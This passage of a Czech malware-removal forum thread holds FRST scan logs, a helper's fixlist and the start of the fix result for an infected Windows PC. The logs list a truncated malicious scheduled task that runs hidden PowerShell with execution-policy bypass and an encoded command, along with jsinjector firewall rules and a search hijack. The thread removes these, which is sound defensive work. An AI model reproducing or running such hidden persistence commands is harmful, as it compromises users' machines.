FirewallRules: [{AF793068-D948-4F96-92F2-78D3C9DA20FB}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{23011A93-2744-4DAC-82CB-D921D9607590}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{AA990127-17ED-4E15-94A8-D5DC6A5F72A1}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{D119C592-22A6-44C6-87C6-A917845F477E}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{5C48F6A2-1FAA-475F-A5D9-4D99B5D1543A}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{D8ABC1D4-2BEC-49E2-8A32-370107136DEC}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{41EFBA00-2592-46D1-AFFF-8C88B7BBACF4}] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
FirewallRules: [{AE21FA56-799F-4D75-A3C2-9038C8711B01}] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
FirewallRules: [TCP Query User{06AC167E-9345-4E67-8923-0B9775C0C74A}C:\program files (x86)\pes 13\pes2013.exe] => (Allow) C:\program files (x86)\pes 13\pes2013.exe
FirewallRules: [UDP Query User{0A6D2ED9-DAFC-4A13-9011-2197C8683564}C:\program files (x86)\pes 13\pes2013.exe] => (Allow) C:\program files (x86)\pes 13\pes2013.exe
FirewallRules: [TCP Query User{0126F709-8266-4591-BC0B-D62217A6B074}D:\games\firewatch\firewatch.exe] => (Allow) D:\games\firewatch\firewatch.exe
FirewallRules: [UDP Query User{7FB62E35-0D62-4D6A-A523-F5DFFC944E6B}D:\games\firewatch\firewatch.exe] => (Allow) D:\games\firewatch\firewatch.exe
FirewallRules: [{301E5091-E852-45AE-8424-83E07AFF4875}] => (Block) D:\games\firewatch\firewatch.exe
FirewallRules: [{C5A13A08-0487-4C01-BFBA-2F250E55343B}] => (Block) D:\games\firewatch\firewatch.exe
FirewallRules: [{0D108194-059D-4D54-B641-926C4DEFEDC2}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{A1C76515-C1DA-4426-879D-B5BA5082DD2A}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{86A9C8BE-2655-4563-85BA-232498F71B13}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{C604DF57-6104-4AF1-A6F0-A4E048036CA6}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{0FFB4464-E682-497F-9F10-561B91CE76BC}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{99E5E200-D0A5-4417-87C4-3F0EEF0A1370}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{89CE51B9-03AF-4D57-959C-001351F744C2}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{421A7ECB-F976-406B-9D3E-A54A3BAFA67F}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{AFE66024-5E24-4508-9AB8-06379192B795}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{1991A45B-BBA8-4DC5-9E68-6091852402D0}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{E30A6B14-812D-4828-B74E-A1DA8A7F82F5}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{20E4A0CE-7671-415F-880B-5AD89E7B5B87}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{4BBF11B4-9A39-4577-8E20-3AB6B5A0E665}] => (Allow) C:\Users\Administrator\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{EBEB3AD9-97B5-49E4-A1F9-D70E33B67EA7}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{211A003F-A471-4B99-B72D-21955183895C}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{BE0F3DAF-D762-4B80-A968-1163758892D0}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{2DC2B3FF-9BE7-486D-A6A1-991AB47478D9}] => (Allow) C:\Windows\dwrcs\DWRCS.EXE
FirewallRules: [{73C4ADED-D0C2-456B-A014-2D3723905903}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

01-04-2016 21:18:18 Scheduled Checkpoint
11-04-2016 20:24:58 Scheduled Checkpoint
17-04-2016 22:58:31 Installed Samsung Kies3

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (04/25/2016 02:37:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: backgroundTaskHost.exe, version: 10.0.10586.0, time stamp: 0x5632d8f0
Faulting module name: twinapi.appcore.dll, version: 10.0.10586.0, time stamp: 0x5632d2f5
Exception code: 0xc000027b
Fault offset: 0x000000000004b199
Faulting process id: 0x2c18
Faulting application start time: 0xbackgroundTaskHost.exe0
Faulting application path: backgroundTaskHost.exe1
Faulting module path: backgroundTaskHost.exe2
Report Id: backgroundTaskHost.exe3
Faulting package full name: backgroundTaskHost.exe4
Faulting package-relative application ID: backgroundTaskHost.exe5

Error: (04/25/2016 02:22:00 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: backgroundTaskHost.exe, version: 10.0.10586.0, time stamp: 0x5632d8f0
Faulting module name: twinapi.appcore.dll, version: 10.0.10586.0, time stamp: 0x5632d2f5
Exception code: 0xc000027b
Fault offset: 0x000000000004b199
Faulting process id: 0x2c0c
Faulting application start time: 0xbackgroundTaskHost.exe0
Faulting application path: backgroundTaskHost.exe1
Faulting module path: backgroundTaskHost.exe2
Report Id: backgroundTaskHost.exe3
Faulting package full name: backgroundTaskHost.exe4
Faulting package-relative application ID: backgroundTaskHost.exe5

Error: (04/25/2016 02:07:05 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: backgroundTaskHost.exe, version: 10.0.10586.0, time stamp: 0x5632d8f0
Faulting module name: twinapi.appcore.dll, version: 10.0.10586.0, time stamp: 0x5632d2f5
Exception code: 0xc000027b
Fault offset: 0x000000000004b199
Faulting process id: 0x2e78
Faulting application start time: 0xbackgroundTaskHost.exe0
Faulting application path: backgroundTaskHost.exe1
Faulting module path: backgroundTaskHost.exe2
Report Id: backgroundTaskHost.exe3
Faulting package full name: backgroundTaskHost.exe4
Faulting package-relative application ID: backgroundTaskHost.exe5

Error: (04/25/2016 01:52:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: backgroundTaskHost.exe, version: 10.0.10586.0, time stamp: 0x5632d8f0
Faulting module name: twinapi.appcore.dll, version: 10.0.10586.0, time stamp: 0x5632d2f5
Exception code: 0xc000027b
Fault offset: 0x000000000004b199
Faulting process id: 0x2700
Faulting application start time: 0xbackgroundTaskHost.exe0
Faulting application path: backgroundTaskHost.exe1
Faulting module path: backgroundTaskHost.exe2
Report Id: backgroundTaskHost.exe3
Faulting package full name: backgroundTaskHost.exe4
Faulting package-relative application ID: backgroundTaskHost.exe5

Error: (04/25/2016 01:36:59 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: backgroundTaskHost.exe, version: 10.0.10586.0, time stamp: 0x5632d8f0
Faulting module name: twinapi.appcore.dll, version: 10.0.10586.0, time stamp: 0x5632d2f5
Exception code: 0xc000027b
Fault offset: 0x000000000004b199
Faulting process id: 0x540
Faulting application start time: 0xbackgroundTaskHost.exe0
Faulting application path: backgroundTaskHost.exe1
Faulting module path: backgroundTaskHost.exe2
Report Id: backgroundTaskHost.exe3
Faulting package full name: backgroundTaskHost.exe4
Faulting package-relative application ID: backgroundTaskHost.exe5

Error: (04/25/2016 01:22:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: backgroundTaskHost.exe, version: 10.0.10586.0, time stamp: 0x5632d8f0
Faulting module name: twinapi.appcore.dll, version: 10.0.10586.0, time stamp: 0x5632d2f5
Exception code: 0xc000027b
Fault offset: 0x000000000004b199
Faulting process id: 0x14ac
Faulting application start time: 0xbackgroundTaskHost.exe0
Faulting application path: backgroundTaskHost.exe1
Faulting module path: backgroundTaskHost.exe2
Report Id: backgroundTaskHost.exe3
Faulting package full name: backgroundTaskHost.exe4
Faulting package-relative application ID: backgroundTaskHost.exe5

Error: (04/25/2016 01:06:02 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: backgroundTaskHost.exe, version: 10.0.10586.0, time stamp: 0x5632d8f0
Faulting module name: twinapi.appcore.dll, version: 10.0.10586.0, time stamp: 0x5632d2f5
Exception code: 0xc000027b
Fault offset: 0x000000000004b199
Faulting process id: 0x1e4c
Faulting application start time: 0xbackgroundTaskHost.exe0
Faulting application path: backgroundTaskHost.exe1
Faulting module path: backgroundTaskHost.exe2
Report Id: backgroundTaskHost.exe3
Faulting package full name: backgroundTaskHost.exe4
Faulting package-relative application ID: backgroundTaskHost.exe5

Error: (04/25/2016 01:00:23 AM) (Source: dwmrcs) (EventID: 110) (User: )
Description: Error:
DameWare Mini Remote Control
Error setsockopt (IP_DROP_MEMBERSHIP)

System Error: 10049
System Message: The requested address is not valid in its context.

(srv 64 bit)

Error: (04/25/2016 12:58:55 AM) (Source: dwmrcs) (EventID: 110) (User: )
Description: Error:
DameWare Mini Remote Control
Error setsockopt (IP_ADD_MEMBERSHIP)

System Error: 10065
System Message: A socket operation was attempted to an unreachable host.

(srv 64 bit)

Error: (04/25/2016 12:58:54 AM) (Source: dwmrcs) (EventID: 110) (User: )
Description: Error:
DameWare Mini Remote Control
Error setsockopt (IP_DROP_MEMBERSHIP)

System Error: 10049
System Message: The requested address is not valid in its context.

(srv 64 bit)


System errors:
=============
Error: (04/25/2016 03:59:11 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_a99234e service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/25/2016 03:59:11 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_a99234e service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/25/2016 03:59:11 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_a99234e service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/25/2016 03:59:11 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_a99234e service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/25/2016 03:16:34 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_57fffad service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/25/2016 03:16:34 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_57fffad service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/25/2016 03:16:34 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_57fffad service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/25/2016 03:16:34 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_57fffad service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/23/2016 11:08:43 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_309778e service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/23/2016 11:08:43 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_309778e service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.


CodeIntegrity:
===================================
Date: 2016-04-16 19:37:06.388
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-04-15 20:03:57.177
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-25 18:00:13.348
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-11 22:52:21.673
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-11 19:17:12.213
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-10 19:32:29.712
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-09 19:30:45.097
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-07 20:29:43.088
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-07 19:31:39.383
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-02 19:33:54.420
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i3 CPU M 330 @ 2.13GHz
Percentage of memory in use: 59%
Total physical RAM: 3957.59 MB
Available physical RAM: 1609.43 MB
Total Virtual: 7925.59 MB
Available Virtual: 5220.78 MB

==================== Drives ================================

Drive c: (WINDOWS) (Fixed) (Total:232.88 GB) (Free:62.44 GB) NTFS
Drive d: (Data) (Fixed) (Total:232.49 GB) (Free:135.99 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 22F49805)
Partition 1: (Not Active) - (Size=400 MB) - (Type=27)
Partition 2: (Not Active) - (Size=232.9 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=232.5 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

[Rudy]

Otevřte poznámkový blok a zkopírujte do něj:

Start
Task: {15B3C99C-441D-4307-9EED-81FF4235CABA} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {21431663-23D7-40F6-A415-22673F2E0617} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {24D2CEAB-ED2E-4B9F-AAE2-8AECBD6D9F1F} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {3338E8A2-41E8-48F3-B771-DF917BA886FF} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {56BEF496-DE23-4FC9-B86F-9168B79EA5DD} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {69AC9BBD-9EB4-4F3B-8F18-9E52ECE2BF73} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {8AE63F37-E3BB-487B-A3E9-89E4E1F3D437} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {8B7CBE50-1EFE-4DCC-A26C-A6526401CE28} - System32\Tasks\Test TimeTrigger => C:\Users\ADMINI~1\AppData\Local\Temp\Runner.exe <==== ATTENTION
Task: {8DA0916B-D6EF-41AC-848E-4E56BFEDC356} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {B80AEAC9-2D84-4293-8EA5-73407A8471BB} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {C06087C5-D73B-4ECB-9E1D-E5267F81C592} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {ED898442-2CFF-46BD-907B-F32299346882} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {F0D5C121-195F-4001-9B8B-5650699451C7} - System32\Tasks\{04090E47-0E7A-0A09-0A11-7D7A0905110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9388 more characters). <==== ATTENTION
Task: {F89990A0-E2B2-449B-9189-935D0BFBEDBA} - \ConfigFree Startup Programs -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000Core.job => C:\Users\pcw\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000UA.job => C:\Users\pcw\AppData\Local\Google\Update\GoogleUpdate.exe
HKLM-x32\...\Run: [mbot_gb_014010252] => [X]
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => No File
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-4246815794-1745546178-596238576-500\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL =
SearchScopes: HKU\S-1-5-21-4246815794-1745546178-596238576-500 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
C:\Program Files (x86)\Skype\Toolbars
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
FF Plugin: @microsoft.com/VirtualEarth3D,version=4.0 -> C:\Program Files (x86)\Virtual Earth 3D\ [No File]
CHR DefaultSearchURL: Default -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms}
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]
StartMenuInternet: Google Chrome.Administrator - C:\Users\Administrator\AppData\Local\Google\Chrome\Application\chrome.exe
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
U3 idsvc; no ImagePath
C:\Users\Administrator\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
C:\Users\Administrator\AppData\Local\Temp
End

Uložte do C:\Users\Administrator\Downloads jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.

[boutek]

Fix result of Farbar Recovery Scan Tool (x64) Version:25-04-2016
Ran by Administrator (2016-04-27 19:38:42) Run:1
Running from C:\Users\Administrator\Downloads
Loaded Profiles: Administrator (Available Profiles: Administrator & Guest & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
Task: {15B3C99C-441D-4307-9EED-81FF4235CABA} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {21431663-23D7-40F6-A415-22673F2E0617} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {24D2CEAB-ED2E-4B9F-AAE2-8AECBD6D9F1F} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {3338E8A2-41E8-48F3-B771-DF917BA886FF} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {56BEF496-DE23-4FC9-B86F-9168B79EA5DD} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {69AC9BBD-9EB4-4F3B-8F18-9E52ECE2BF73} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {8AE63F37-E3BB-487B-A3E9-89E4E1F3D437} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {8B7CBE50-1EFE-4DCC-A26C-A6526401CE28} - System32\Tasks\Test TimeTrigger => C:\Users\ADMINI~1\AppData\Local\Temp\Runner.exe <==== ATTENTION
Task: {8DA0916B-D6EF-41AC-848E-4E56BFEDC356} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {B80AEAC9-2D84-4293-8EA5-73407A8471BB} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {C06087C5-D73B-4ECB-9E1D-E5267F81C592} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {ED898442-2CFF-46BD-907B-F32299346882} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {F0D5C121-195F-4001-9B8B-5650699451C7} - System32\Tasks\{04090E47-0E7A-0A09-0A11-7D7A0905110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9388 more characters). <==== ATTENTION
Task: {F89990A0-E2B2-449B-9189-935D0BFBEDBA} - \ConfigFree Startup Programs -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000Core.job => C:\Users\pcw\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000UA.job => C:\Users\pcw\AppData\Local\Google\Update\GoogleUpdate.exe
HKLM-x32\...\Run: [mbot_gb_014010252] => [X]
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => No File
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-4246815794-1745546178-596238576-500\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL =
SearchScopes: HKU\S-1-5-21-4246815794-1745546178-596238576-500 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
C:\Program Files (x86)\Skype\Toolbars
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
FF Plugin: @microsoft.com/VirtualEarth3D,version=4.0 -> C:\Program Files (x86)\Virtual Earth 3D\ [No File]
CHR DefaultSearchURL: Default -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms}
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]
StartMenuInternet: Google Chrome.Administrator - C:\Users\Administrator\AppData\Local\Google\Chrome\Application\chrome.exe
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
U3 idsvc; no ImagePath
C:\Users\Administrator\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
C:\Users\Administrator\AppData\Local\Temp
End
*****************

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{15B3C99C-441D-4307-9EED-81FF4235CABA}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{15B3C99C-441D-4307-9EED-81FF4235CABA}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{21431663-23D7-40F6-A415-22673F2E0617}" => key removed successfully
